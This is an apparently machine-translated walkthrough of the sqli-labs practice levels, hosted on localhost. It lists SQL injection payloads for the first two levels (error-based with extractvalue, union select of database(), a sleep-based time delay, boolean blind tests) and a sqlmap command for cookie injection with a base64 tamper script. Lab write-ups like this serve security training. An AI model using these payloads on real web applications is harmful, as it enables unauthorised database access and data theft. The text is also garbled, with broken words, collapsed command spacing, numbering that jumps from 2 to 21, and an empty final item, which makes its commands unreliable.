Attached tools:
phpstudy2016: Link: http://pan.baidu.com/s/1bpbEBCj Password: FMR4
Sqli-labs-master: Link: http://pan.baidu.com/s/1jH4WlMY Password: 11MJ
The environment has been written before, there is not much to say, directly to start the customs experience
1, http://127.0.0.1/sqli-labs-master/Less-1/?id=1 Single Primer sizes
Error-Type injection payload:
1 ' and 1=extractvalue (1,concat (0x7e, (select Database ()))--+
Union union query type Injection payload:
0 ' Union Select 1,database (), 3--+
Time-Delayed injection payload:
1%27%20and%20sleep (5)--+
Boolean Blind Payload:
1 ' and 1=1--+
1 ' and 1=2--+
2, Http://127.0.0.1/sqli-labs-master/Less-2/?id=1
0%20union%20select%201,database (), 3%20--+
21. cookie-Type Injection
Grab the package, modify the request package content
Copy the contents to C:\Users\qiupan\Desktop\26.txt and execute the command in Sqlmap:
Python.exe sqlmap.py-r C:\Users\qiupan\Desktop\26.txt--cookie "uname=ywrtaw4%3d"--technique E--dbms mysql--tamper "b ase64encode.py "--batch
22, filter the comment character
Use and ' 1 ' = ' to enclose the quotation mark
23.
Sqli-labs Customs Summary